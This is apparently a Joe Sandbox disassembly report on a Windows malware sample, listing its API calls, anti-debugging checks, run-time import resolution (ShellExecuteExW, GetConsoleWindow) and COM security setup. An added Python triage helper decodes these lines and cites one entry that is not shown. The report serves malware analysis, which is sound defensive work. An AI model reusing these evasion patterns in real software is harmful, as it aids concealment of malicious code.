                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 6ad6fa65bd0fad532e5cb94bbf63e0da9314c882b0d4c0b66f8fa01822fb1ef8
                                        • Instruction ID: 9f4b7c4aeb43490a60753438ea874f7eb4575a14322e8415d676beb20874d727
                                        • Opcode Fuzzy Hash: 6ad6fa65bd0fad532e5cb94bbf63e0da9314c882b0d4c0b66f8fa01822fb1ef8
                                        • Instruction Fuzzy Hash: 0731D4749016289BCB21DF28DC8979DBBB8FF08311F5041EAE91CA7251EB349F858F45
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000003,?,00855A67,00000003,00864778,0000000C,00855B7A,00000003,00000002,00000000,?,00856B43,00000003), ref: 00855AB2
                                        • TerminateProcess.KERNEL32(00000000,?,00855A67,00000003,00864778,0000000C,00855B7A,00000003,00000002,00000000,?,00856B43,00000003), ref: 00855AB9
                                        • ExitProcess.KERNEL32 ref: 00855ACB
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 4f3c56529081c54b0acf7ae60daacccb634af50a83c24b1eece9d78c8bee70bc
                                        • Instruction ID: 4055c5a30a922216334bc8e6ed145ef94861e8b600d6481f61ff64caa620ac83
                                        • Opcode Fuzzy Hash: 4f3c56529081c54b0acf7ae60daacccb634af50a83c24b1eece9d78c8bee70bc
                                        • Instruction Fuzzy Hash: B2E04631000A08ABCF02BF58DC58A493BA9FF14353F088020FD09CB163DB39DC46CA90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: 8f92c3659f25898acd4e3c4257262f67a32b11aed3702297e17542cbf183e925
                                        • Instruction ID: 45113c1beff6da560067752be8e2ef75195144d89f97b75d3f190864107f4ee1
                                        • Opcode Fuzzy Hash: 8f92c3659f25898acd4e3c4257262f67a32b11aed3702297e17542cbf183e925
                                        • Instruction Fuzzy Hash: 2AA00270505602CB57404F355D0570F3695754569670591759515C6161E76844505F51
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 026343969d9766ef2b8ec58364c0306f94746e60bf6072c1b5685626d48a7f8e
                                        • Instruction ID: 1b9fe244800136fe6351165a572e9c02f6d0c6e4c3be10f501cd95dea462afb3
                                        • Opcode Fuzzy Hash: 026343969d9766ef2b8ec58364c0306f94746e60bf6072c1b5685626d48a7f8e
                                        • Instruction Fuzzy Hash: 2AE01275A44644AFCB15CF54D841F15B7E8FB09B21F14466DEC16C7790DB35A8008A40

                                        Control-flow Graph (rendered graph not reproduced; basic blocks 851320-851875, entered at the CoInitializeSecurity call in block 851320)
                                        APIs
                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,3B4B4A20), ref: 0085137D
                                        • CoCreateInstance.OLE32(0085F378,00000000,00000001,0085F2A8,?), ref: 008513A0
                                        • new.LIBCMT ref: 008513E8
                                        • SysAllocString.OLEAUT32(004F0052), ref: 00851415
                                        • _com_issue_error.COMSUPP ref: 00851422
                                        • _com_issue_error.COMSUPP ref: 00851439
                                        • InterlockedDecrement.KERNEL32(00000008), ref: 00851467
                                        • SysFreeString.OLEAUT32 ref: 00851478
                                        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 008514C1
                                        • SysAllocString.OLEAUT32(?), ref: 0085153F
                                        • SysAllocString.OLEAUT32(00690057), ref: 0085155F
                                        • SysAllocString.OLEAUT32(00867348), ref: 008515C1
                                        • VariantClear.OLEAUT32(?), ref: 008515EC
                                        • SysStringByteLen.OLEAUT32(00000000), ref: 0085160B
                                        • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 00851615
                                        • SysFreeString.OLEAUT32(00000000), ref: 008516E6
                                        • SysFreeString.OLEAUT32(00000000), ref: 008516E9
                                        • VariantInit.OLEAUT32(?), ref: 00851752
                                        • VariantClear.OLEAUT32(?), ref: 008517B9
                                        • VariantClear.OLEAUT32(?), ref: 008517CB
                                        • VariantClear.OLEAUT32(?), ref: 008517E9
                                        • SysFreeString.OLEAUT32(00000000), ref: 00851800
                                        • SysFreeString.OLEAUT32(00000000), ref: 00851803
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: String$AllocFreeVariant$Clear$Byte_com_issue_error$BlanketCreateDecrementInitInitializeInstanceInterlockedProxySecurity
                                        • String ID: Pou$ReturnValue
                                        • API String ID: 1902500518-3391372667
                                        • Opcode ID: 65412166920c73155a6fd56830ceb4f027c7e756f1b24ad212263fa896fb654a
                                        • Instruction ID: f07040607aa6242ad6a4e232e7b0719d8d3e6049926ff62b5f68329e48fbd4a9
                                        • Opcode Fuzzy Hash: 65412166920c73155a6fd56830ceb4f027c7e756f1b24ad212263fa896fb654a
                                        • Instruction Fuzzy Hash: 2DF11C70A00348EBEF20DFA5CC48B9EBBB9FF45705F208198E945EB291DB759948CB51

                                        Control-flow Graph (rendered graph not reproduced; basic blocks 851280-851312, six GetProcAddress call sites each guarded by a null-handle branch)
                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 00851297
                                        • GetProcAddress.KERNEL32(?,ShellExecuteExW), ref: 008512AD
                                        • GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 008512C2
                                        • GetProcAddress.KERNEL32(00000000,GetConsoleWindow), ref: 008512D7
                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 008512EC
                                        • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00851301
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: AddressProc
                                        • String ID: CloseHandle$GetConsoleWindow$GetEnvironmentVariableW$GetModuleFileNameW$ShellExecuteExW$ShowWindow
                                        • API String ID: 190572456-122698628
                                        • Opcode ID: 903a99839022d14b759150f795fdc7f04fd3be56b2d6875b2d6243a635d2788f
                                        • Instruction ID: fbd83e5969ef34bc94dca497993c0d2fdcab6018c380c702f50806d7350dd035
                                        • Opcode Fuzzy Hash: 903a99839022d14b759150f795fdc7f04fd3be56b2d6875b2d6243a635d2788f
                                        • Instruction Fuzzy Hash: 41110C70750704AACBB0DF3DDC48B13B7E8FF44745B25092DA899D3A40E7B4E9448B20

                                        Control-flow Graph (rendered graph not reproduced; basic blocks 8595ee-859737)
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 00859632
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 008591CA
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 008591DC
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 008591EE
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 00859200
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 00859212
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 00859224
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 00859236
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 00859248
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 0085925A
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 0085926C
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 0085927E
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 00859290
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 008592A2
                                        • _free.LIBCMT ref: 00859627
                                          • Part of subcall function 00856A79: HeapFree.KERNEL32(00000000,00000000,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?), ref: 00856A8F
                                          • Part of subcall function 00856A79: GetLastError.KERNEL32(?,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?,?), ref: 00856AA1
                                        • _free.LIBCMT ref: 00859649
                                        • _free.LIBCMT ref: 0085965E
                                        • _free.LIBCMT ref: 00859669
                                        • _free.LIBCMT ref: 0085968B
                                        • _free.LIBCMT ref: 0085969E
                                        • _free.LIBCMT ref: 008596AC
                                        • _free.LIBCMT ref: 008596B7
                                        • _free.LIBCMT ref: 008596EF
                                        • _free.LIBCMT ref: 008596F6
                                        • _free.LIBCMT ref: 00859713
                                        • _free.LIBCMT ref: 0085972B
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: 6c16c54741539a671f5c916de1f85fc59b1d73cf6530337925734765f1c0bfd3
                                        • Instruction ID: 6de07cda4199215f3ddf71d81f647d6b577ce4f61e304e1a9f3bfe6516d36ca3
                                        • Opcode Fuzzy Hash: 6c16c54741539a671f5c916de1f85fc59b1d73cf6530337925734765f1c0bfd3
                                        • Instruction Fuzzy Hash: 7E314F31500201EFDB21AE79D845B6A73E9FF10362F54841EE899D7161EF31AC9CCB61

                                        Control-flow Graph (rendered graph not reproduced; basic blocks 8511a0-851272, GetModuleHandleW in block 8511a0, call to 851280 in block 85122c)
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32), ref: 008511B9
                                        • GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 008511EC
                                        • GetProcAddress.KERNEL32(00000000,wsprintfW), ref: 00851226
                                        • GetProcAddress.KERNEL32(41797261,CoInitialize), ref: 00851243
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: CoInitialize$KERNEL32$LoadLibraryA$OLE32$SHELL32$USER32$wsprintfW
                                        • API String ID: 667068680-4279566152
                                        • Opcode ID: 996b647f919f4035732f1baf50b71323133536ebae47282aa78a2422f1b2bfb1
                                        • Instruction ID: 2fe8f030bb0adf4057a40601d0d9ca181e357a6831af489c15b350b8b3386d01
                                        • Opcode Fuzzy Hash: 996b647f919f4035732f1baf50b71323133536ebae47282aa78a2422f1b2bfb1
                                        • Instruction Fuzzy Hash: 60216A70A007049FCB60DFB9D905B6AB7F4FF48711B01496EE85AD3740EA74EA088B61
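The two entries above (851280 and 8511a0) show the loader building its import table at run time with GetModuleHandleW/GetProcAddress, and the entry at 851320 shows a COM client initialised with numeric security constants. The following Python is an added triage helper, not part of the Joe Sandbox report and not code from the sample: it parses API lines in the exact "Api.MODULE(args), ref: ADDR" shape printed in this section, lists the names resolved through GetProcAddress in call-site order, and names the Windows SDK constants passed to CoInitializeSecurity, CoSetProxyBlanket and CoCreateInstance. The sample lines are copied from the entries above; the constant values are from the SDK headers; the regex and the reading of the GetProcAddress list as a hidden import table are this example's own assumptions. It does not try to identify the CLSID/IID at 0085F378/0085F2A8, which the report does not print.

```python
"""Triage helper for the API-call lines of a Joe Sandbox disassembly section.

Added example; not part of the Joe Sandbox report and not code from the sample.
It parses lines shaped like "Api.MODULE(arg,...), ref: ADDR", lists the names
the loader resolves through GetProcAddress, and names the COM security constants
passed to CoInitializeSecurity, CoSetProxyBlanket and CoCreateInstance.
Constant values come from the Windows SDK headers; the regex and the "hidden
import table" reading are this example's own assumptions.
"""
import re
from typing import Dict, List, NamedTuple


class ApiCall(NamedTuple):
    api: str
    module: str
    args: List[str]   # raw values as printed; "?" means the sandbox could not recover it
    ref: int          # call-site address


# Sample input copied from the report entries above (process 18, image base 0x850000).
REPORT_LINES = """\
GetModuleHandleW.KERNEL32(KERNEL32), ref: 008511B9
GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 008511EC
GetProcAddress.KERNEL32(00000000,wsprintfW), ref: 00851226
GetProcAddress.KERNEL32(41797261,CoInitialize), ref: 00851243
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 00851297
GetProcAddress.KERNEL32(?,ShellExecuteExW), ref: 008512AD
GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 008512C2
GetProcAddress.KERNEL32(00000000,GetConsoleWindow), ref: 008512D7
GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 008512EC
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00851301
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,3B4B4A20), ref: 0085137D
CoCreateInstance.OLE32(0085F378,00000000,00000001,0085F2A8,?), ref: 008513A0
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 008514C1
""".splitlines()

# "Name.MODULE", optional "(args)", then "ref: ADDR"; a leading bullet is tolerated.
CALL_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Windows SDK values (rpcdce.h / objbase.h) for the security-relevant parameters.
AUTHN_LEVEL = {0: "RPC_C_AUTHN_LEVEL_DEFAULT", 1: "RPC_C_AUTHN_LEVEL_NONE",
               2: "RPC_C_AUTHN_LEVEL_CONNECT", 3: "RPC_C_AUTHN_LEVEL_CALL",
               4: "RPC_C_AUTHN_LEVEL_PKT", 5: "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY",
               6: "RPC_C_AUTHN_LEVEL_PKT_PRIVACY"}
IMP_LEVEL = {0: "RPC_C_IMP_LEVEL_DEFAULT", 1: "RPC_C_IMP_LEVEL_ANONYMOUS",
             2: "RPC_C_IMP_LEVEL_IDENTIFY", 3: "RPC_C_IMP_LEVEL_IMPERSONATE",
             4: "RPC_C_IMP_LEVEL_DELEGATE"}
AUTHN_SVC = {0: "RPC_C_AUTHN_NONE", 9: "RPC_C_AUTHN_GSS_NEGOTIATE", 10: "RPC_C_AUTHN_WINNT",
             14: "RPC_C_AUTHN_GSS_SCHANNEL", 16: "RPC_C_AUTHN_GSS_KERBEROS"}
AUTHZ_SVC = {0: "RPC_C_AUTHZ_NONE", 1: "RPC_C_AUTHZ_NAME", 2: "RPC_C_AUTHZ_DCE"}
EOAC = {0: "EOAC_NONE", 0x20: "EOAC_DYNAMIC_CLOAKING", 0x40: "EOAC_STATIC_CLOAKING"}
CLSCTX = {1: "CLSCTX_INPROC_SERVER", 4: "CLSCTX_LOCAL_SERVER", 0x10: "CLSCTX_REMOTE_SERVER"}

# (argument index per the SDK prototype, parameter name, lookup table).
COM_PARAMS = {
    "CoInitializeSecurity": [(4, "dwAuthnLevel", AUTHN_LEVEL), (5, "dwImpLevel", IMP_LEVEL),
                             (7, "dwCapabilities", EOAC)],
    "CoSetProxyBlanket": [(1, "dwAuthnSvc", AUTHN_SVC), (2, "dwAuthzSvc", AUTHZ_SVC),
                          (4, "dwAuthnLevel", AUTHN_LEVEL), (5, "dwImpLevel", IMP_LEVEL),
                          (7, "dwCapabilities", EOAC)],
    "CoCreateInstance": [(2, "dwClsContext", CLSCTX)],
}


def parse_calls(lines: List[str]) -> List[ApiCall]:
    """Parse report lines into ApiCall records; lines in another shape are skipped."""
    calls = []
    for line in lines:
        m = CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls


def hidden_imports(calls: List[ApiCall]) -> List[str]:
    """Names passed to GetProcAddress, in call-site order: the imports the loader
    resolves at run time instead of declaring them in the PE import table."""
    return [c.args[1] for c in sorted(calls, key=lambda c: c.ref)
            if c.api == "GetProcAddress" and len(c.args) == 2]


def decode_com_security(calls: List[ApiCall]) -> Dict[str, Dict[str, str]]:
    """Map the numeric COM security arguments to their SDK constant names."""
    out: Dict[str, Dict[str, str]] = {}
    for c in calls:
        spec = COM_PARAMS.get(c.api)
        if spec is None:
            continue
        decoded = {}
        for idx, name, table in spec:
            if idx >= len(c.args) or c.args[idx] == "?":
                decoded[name] = "unrecovered"   # sandbox printed "?" or too few arguments
                continue
            value = int(c.args[idx], 16)
            decoded[name] = table.get(value, f"0x{value:X}")   # unknown value: keep the hex
        out[c.api] = decoded
    return out


if __name__ == "__main__":
    calls = parse_calls(REPORT_LINES)
    print("run-time resolved imports:", ", ".join(hidden_imports(calls)))
    for api, params in decode_com_security(calls).items():
        print(api, params)
```

On the lines above this yields nine run-time resolved names, among them ShellExecuteExW and GetConsoleWindow, the pair the entry at 00851D8B/00851E2E calls, and decodes the COM setup as RPC_C_AUTHN_LEVEL_DEFAULT with RPC_C_IMP_LEVEL_IMPERSONATE for the process, then RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_CALL and RPC_C_IMP_LEVEL_IMPERSONATE on the proxy, with CLSCTX_INPROC_SERVER for the object; this is the argument set used by Microsoft's documented COM client boilerplate, so the decoded names are a faster way to recognise the pattern than the raw hex. Feed the tool the whole "APIs" list of a report to get the complete list rather than the excerpt embedded here.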

                                        Control-flow Graph (rendered graph not reproduced; basic blocks 856eff-856fa7)
                                        APIs
                                        • _free.LIBCMT ref: 00856F13
                                          • Part of subcall function 00856A79: HeapFree.KERNEL32(00000000,00000000,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?), ref: 00856A8F
                                          • Part of subcall function 00856A79: GetLastError.KERNEL32(?,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?,?), ref: 00856AA1
                                        • _free.LIBCMT ref: 00856F1F
                                        • _free.LIBCMT ref: 00856F2A
                                        • _free.LIBCMT ref: 00856F35
                                        • _free.LIBCMT ref: 00856F40
                                        • _free.LIBCMT ref: 00856F4B
                                        • _free.LIBCMT ref: 00856F56
                                        • _free.LIBCMT ref: 00856F61
                                        • _free.LIBCMT ref: 00856F6C
                                        • _free.LIBCMT ref: 00856F7A
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 32562305491dea9a2102bd42d36dfe4f15f82996e2e7cbf6effe74db25c55cbb
                                        • Instruction ID: 5473c9e69b98caf0a20d70de8307f0a62419a4170c030ff4002ec9bc214ee1b9
                                        • Opcode Fuzzy Hash: 32562305491dea9a2102bd42d36dfe4f15f82996e2e7cbf6effe74db25c55cbb
                                        • Instruction Fuzzy Hash: 9D117A75500118EFCB02EFD9D842CD93B75FF043A1B9180A6BE089F132E631DAA89B41

                                        Control-flow Graph
                                        • Rendered graph not preserved; basic blocks span 85b24a-85b4f1 and call GetCPInfo, MultiByteToWideChar and the internal functions 85b10b, 8523ea, 852930, 856ab3, 859551 and 8573af.
                                        APIs
                                        • GetCPInfo.KERNEL32(?,?), ref: 0085B2F6
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0085B379
                                        • __alloca_probe_16.LIBCMT ref: 0085B3B1
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0085B40C
                                        • __alloca_probe_16.LIBCMT ref: 0085B45B
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0085B423
                                          • Part of subcall function 00856AB3: HeapAlloc.KERNEL32(00000000,?,?,?,0085242C,?,?,008510CE,0000000C,3B4B4A20,?,?,?,?,0085E95F,000000FF), ref: 00856AE5
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0085B49F
                                        • __freea.LIBCMT ref: 0085B4CA
                                        • __freea.LIBCMT ref: 0085B4D6
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                        • String ID:
                                        • API String ID: 3256262068-0
                                        • Opcode ID: 94ee91eb3df0b0ae967e9ac50f773aa1b4378e93343a77e502ed3f2ea24585b3
                                        • Instruction ID: f39746e9a5706abc50ce442d1464e4ee367361b1776543eda1c033a3140f2831
                                        • Opcode Fuzzy Hash: 94ee91eb3df0b0ae967e9ac50f773aa1b4378e93343a77e502ed3f2ea24585b3
                                        • Instruction Fuzzy Hash: 0991D471E0021A9FDF208E65CC81AEE7BA5FF29752F184559EC04E7241E734CC48C765

                                        Control-flow Graph
                                        • Rendered graph not preserved; basic blocks span 85858c-8587c6 and call SetEnvironmentVariableA and the internal functions 85e6e0, 8556ad, 8587c7, 858878, 856a79, 856143, 856b44, 8556c5, 856a1f and 855601.
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                        • String ID:
                                        • API String ID: 1282221369-0
                                        • Opcode ID: fa356ceb46c39db9710ccd8d64b4f3362bd906246e4f0ed21b0c3836c18f2e01
                                        • Instruction ID: e16f78bcd4de5798e0c76d67c9a87059d541dff3d769e9758e767d193c68ed91
                                        • Opcode Fuzzy Hash: fa356ceb46c39db9710ccd8d64b4f3362bd906246e4f0ed21b0c3836c18f2e01
                                        • Instruction Fuzzy Hash: 93611475900340EFCB21AFB8C84566A7BE4FF15362B54416FED00F7282FE7289088B52
                                        APIs
                                        • _com_issue_error.COMSUPP ref: 00852204
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,008519EF,?,00000000,00000000,?,?,?,?,?,008519EF), ref: 00852213
                                        • GetLastError.KERNEL32(?,?,?,?,?,008519EF), ref: 0085222E
                                        • _com_issue_error.COMSUPP ref: 00852241
                                        • SysAllocString.OLEAUT32(00000000), ref: 00852247
                                        • _com_issue_error.COMSUPP ref: 00852269
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _com_issue_error$AllocByteCharErrorLastMultiStringWide
                                        • String ID: JK;
                                        • API String ID: 1412949955-1593640926
                                        • Opcode ID: 274e30d82183aaa92bddd2b89e873c1997e2cbe5a95f2f26edc35c8f06cd650a
                                        • Instruction ID: e4e2323869be25419c4bdd4b1837e304346f7271d2b5158651aff088cd27647b
                                        • Opcode Fuzzy Hash: 274e30d82183aaa92bddd2b89e873c1997e2cbe5a95f2f26edc35c8f06cd650a
                                        • Instruction Fuzzy Hash: 4A110C7AB0161497CB205FA89C45B9FB764FF09323F404125FD05F7291DF29A848C6E6
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,008583CC,00000000,?,?,?,0085ABE4,?,?,00000100), ref: 0085A9ED
                                        • __alloca_probe_16.LIBCMT ref: 0085AA25
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,0085ABE4,?,?,00000100,5EFC4D8B,?,?), ref: 0085AA73
                                        • __alloca_probe_16.LIBCMT ref: 0085AB0A
